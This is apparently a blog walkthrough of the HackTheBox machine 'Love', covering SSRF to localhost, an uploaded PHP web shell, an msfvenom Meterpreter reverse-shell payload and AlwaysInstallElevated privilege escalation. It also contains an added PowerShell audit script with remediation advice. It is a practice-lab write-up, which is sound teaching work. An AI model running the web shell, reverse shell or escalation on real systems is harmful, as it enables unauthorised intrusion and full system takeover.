In this post we walk through a solution of the HackTheBox machine “Love”. It is a Windows-based machine that HTB users rate as easy, but we think a step-by-step solution is useful for beginners. So let’s start…
The Nmap scan reveals 7 open ports:
The Nmap scan also shows two subdomains:
Let us check whether the web page holds any valuable information. As the picture below shows, the web page is a voting system and it has an “admin” directory. Another web service is running on port 5000, but we are not allowed to access it directly.
When we visit the subdomain “staging.love.htb”, we get the following web page.
The page looks like a File Scanner: when we provide a URL to “demo.php”, the server makes the request and displays the response to us. Since the web service on port 5000 is forbidden to us, maybe we can reach it through the server instead. That did not work when we pointed it at the machine’s IP address (10.10.10.239). However, because the File Scanner and the port 5000 service run on the same server, we may be able to reach it through localhost (127.0.0.1).
Requesting localhost on port 5000 through the scanner reveals the credentials for the voting system (admin/@LoveIsInTheAir!!!!). Let’s log in to the admin dashboard and upload a PHP backdoor. Our PHP backdoor is saved as “cyberenum.php” and uploaded to the /images directory. The PHP code is shown below.
<?php echo system($_GET["cmd"]); ?>
Using msfvenom we created a Meterpreter reverse TCP payload. After creating the payload we uploaded the executable to the server the same way we uploaded the PHP backdoor.
msfvenom -p windows/meterpreter/reverse_tcp lhost=tun0 lport=12345 -f exe -o cyberenum.exe
We confirmed the upload by browsing “http://10.10.10.239/images/cyberenum.php?cmd=dir”. After seeing the executable in the directory listing, we obtained the reverse shell by browsing “http://10.10.10.239/images/cyberenum.php?cmd=cyberenum.exe”.
We enumerated the user’s privileges and the machine’s configuration. While looking at the Windows group policies we noticed that the “AlwaysInstallElevated” policy is enabled for the current user (phoebe).
What is AlwaysInstallElevated policy?
Windows ships with the Windows Installer engine, which MSI packages use to install applications. The AlwaysInstallElevated policy makes the engine install MSI packages with elevated (SYSTEM) privileges, even for non-admin users. The policy is set in the Local Group Policy editor and directs Windows Installer to use elevated permissions whenever it installs a program on the system. This poses a high security risk: a non-administrator user can run installations with elevated privileges and thereby access many protected locations on the computer.
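To audit for this misconfiguration on your own systems, the following PowerShell snippet is an added example (not code from the original post) that reads the policy value from both registry hives. The registry paths are the documented locations of the policy; the function name is our own. Windows Installer only honours the policy when the value is 1 under both HKLM and HKCU, so the check reports the effective state rather than either value alone.

```powershell
# Added example, not from the original post: audit the AlwaysInstallElevated policy.
# Windows Installer honours the policy only when the value is 1 in BOTH hives.
$valueName = 'AlwaysInstallElevated'
$paths = @{
    'HKLM' = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    'HKCU' = 'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
}

function Get-AlwaysInstallElevatedState {
    $result = @{}
    foreach ($hive in $paths.Keys) {
        $path = $paths[$hive]
        # A missing key or value means the policy is not configured, which behaves as 0.
        $item = Get-ItemProperty -Path $path -Name $valueName -ErrorAction SilentlyContinue
        $result[$hive] = if ($null -ne $item) { [int]$item.$valueName } else { 0 }
    }
    return $result
}

$state = Get-AlwaysInstallElevatedState
$state.GetEnumerator() | ForEach-Object { "{0}: {1}" -f $_.Key, $_.Value }

if ($state['HKLM'] -eq 1 -and $state['HKCU'] -eq 1) {
    Write-Warning "AlwaysInstallElevated is effective: any MSI this user installs runs as SYSTEM."
} else {
    Write-Output "AlwaysInstallElevated is not effective (needs 1 in both HKLM and HKCU)."
}
```

If the check warns, remediate through Group Policy rather than by editing the registry by hand: the setting is “Always install with elevated privileges” under Windows Components > Windows Installer, in both Computer Configuration and User Configuration, and should be Disabled or Not Configured in both places.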
Even though we have a session established, we still need to elevate our privileges and capture the admin user. So we push the current session to the background and search for a module that exploits the AlwaysInstallElevated policy. The module for this policy is “exploit/windows/local/always_install_elevated”. After running it we obtained admin access to the machine.
Now that we have an elevated session for the machine we can browse for Administrator’s desktop and grab the root.txt.
That is all for this post.
Omer Faruk Kerman